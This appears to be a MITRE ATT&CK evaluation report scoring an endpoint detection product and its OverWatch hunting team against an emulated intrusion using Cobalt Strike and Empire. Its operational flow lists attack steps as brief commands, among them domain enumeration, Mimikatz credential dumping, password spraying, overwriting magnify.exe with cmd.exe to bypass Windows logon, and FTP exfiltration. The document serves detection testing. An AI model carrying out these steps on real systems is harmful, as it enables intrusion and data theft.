Telemetry from process tree showing sc.exe execution with the AdobeUpdater service description (tainted from previous powershell.exe detection by red line indicating high severity)
Telemetry showing AdobeUpdater service details with binPath pointed to cmd.exe with arguments and service description
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments to query the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a Specific Behavior because the user Bob queried for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing sc.exe execution to query the AdobeUpdater service on Creeper process tree view (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed Bob querying for a service (Specific Behavior)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments to start the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a Specific Behavior because update.vbs executed following the start of the AdobeUpdater service. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing sc start in the process tree view (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed execution of update.vbs following the AdobeUpdater service start (Specific Behavior)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The process tree view showed reg.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree view showing reg.exe executing with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree view showing reg.exe executing with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed takeown.exe executing with command-line arguments. The process tree view showed takeown.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because takeown.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree view showing execution of takeown.exe (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed takeown.exe executed to bypass Windows logon (General Behavior)
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed execution of icacls.exe with command-line arguments. The process tree view showed icacls.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because icacls.exe was executed to bypass Windows logon. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree view showing execution of icacls.exe (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed icacls.exe executed to bypass Windows logon (General Behavior)
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
  
 
Telemetry showed a file write of magnify.exe by powershell.exe in the system directory. The telemetry was tainted by an alert on its parent powershell.exe process.
Telemetry showing file write of magnify.exe by powershell.exe (tainted by parent powershell.exe high severity alert indicated by red icon)
Additional view of telemetry showing the magnify.exe file write
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry
  
Telemetry showed the .vsdx file being written into the Recycle Bin.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed the .vsdx file being copied to the Recycle Bin, a "likely location to stage files of interest." OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing the .vsdx being written into the Recycle Bin (event_SimpleName of OoxmlFileWritten)
Email excerpt sent by OverWatch team indicating they observed the .vsdx file being copied to Recycle Bin for staging (Specific Behavior)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure, though telemetry was available for the write file of the .vsdx into the Recycle Bin (no data was available that indicated it came from a network shared drive).
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
  
Telemetry showed the SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR.
Telemetry showing SHA256 hash of recycler.exe
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed file write of recycler.exe by powershell.exe as well as the network connection over which the download occurred. The process tree view showed the parent powershell.exe process as tainted by a previous wscript.exe detection.
Telemetry showing file write of recycler.exe (parent powershell.exe tainted by previous wscript.exe detection by red line indicating high severity)
Telemetry showing network connection from 192.168.0.5 (C2 server) used by powershell.exe to transfer recycler.exe (parent powershell.exe tainted by previous wscript.exe detection by red line indicating high severity)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a RAR archive "written by a process with suspicious command line arguments." The alert showed the command-line details and was tagged with the correct ATT&CK Technique (Data Compressed) and Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection.
Telemetry
  
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a Specific Behavior because a .vsdx file was archived for likely exfiltration using the renamed RAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert on RAR archive written (mapped to correct ATT&CK Technique, Data Compressed, and Tactic, Exfiltration; tainted by previous powershell.exe detection by red line indicating high severity)
Additional details of recycler.exe from the alert showing it was signed by win.rar GmbH
Email excerpt sent by OverWatch team indicating they observed a .vsdx file archived using the renamed RAR binary, recycler.exe (Specific Behavior)
Data Encrypted
(T1022)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed the flags -hp within the command line that indicated use of encryption, and the alert was mapped to a related ATT&CK Technique (Data Compressed) and the correct Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection.
Telemetry
  
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing use of -hp flags within command-line (mapped to related ATT&CK Technique, Data Compressed, and correct Tactic, Exfiltration; tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed a .vsdx file archived using the renamed RAR binary, recycler.exe (Specific Behavior)
Masquerading
(T1036)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments.". Details showed that recycler.exe wrote a RAR archive and that recycler.exe was signed by win.rar GmbH. The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection.
Telemetry
  
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing recycler.exe was identified as WinRAR (tainted by previous powershell.exe detection by red line indicating high severity)
Additional alert details showing recycler.exe was signed by win.rar GmbH
Email excerpt sent by OverWatch team indicating they observed a .vsdx file archived using the renamed RAR binary, recycler.exe (Specific Behavior)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious. The process tree view showed ftp.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed ftp.exe executing with ftp.txt. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because collected files were exfiltrated via FTP. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed the collected files being exfiltrated via FTP (Specific Behavior)
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry
  
Telemetry showed the deletion of old.rar with an event name of FileDeleted.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including old.rar) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing deletion of old.rar
Email excerpt sent by OverWatch team indicating they observed old.rar being deleted (Specific Behavior)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Telemetry
  
Telemetry showed the deletion of recycler.exe with an event name of ExecutableDeleted.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including recycler.exe) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing deletion of recycler.exe
Email excerpt sent by OverWatch team indicating they observed recycler.exe being deleted (Specific Behavior)
20.A.1
magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Specific Behavior
  
A Specific Behavior alert was generated on utilman.exe executing magnify.exe, noting that "a process chain bypassed Windows logon security." The alert was marked critical and was mapped to the correct ATT&CK Technique (Accessibility Features) and Tactic (Persistence). Data in the alert also showed that magnify.exe was identified as cmd.exe based on hash value in the common name field.
Telemetry
  
Telemetry within the alert showed the details for magnify.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
OverWatch generated a General Behavior alert indicating a Windows logon bypass on Creeper was observed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert showing magnify.exe executing from utilman.exe (mapped to correct ATT&CK Technique, Accessibility Features, and Tactic, Persistence; pink indicates critical severity)
File details of magnify.exe in Accessibility Features Specific Behavior alert identifying it as cmd.exe by hash and common name
Email excerpt from the OverWatch team indicating they observed a Windows logon bypass (General Behavior)
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed a logon type 10 (remote interactive logon) for Kmitnick on Creeper, indicating a RDP session was established and logged into.
Telemetry showing logon type 10 (remote interactive logon) for Kmitnick on Creeper
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed execution of whoami.exe. The process tree view showed whoami.exe was tainted by a previous magnify.exe detection.
Telemetry from process tree showing magnify.exe child process whoami.exe (tainted by pink line indicating critical severity)







Operational Flow The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discover

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discover

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)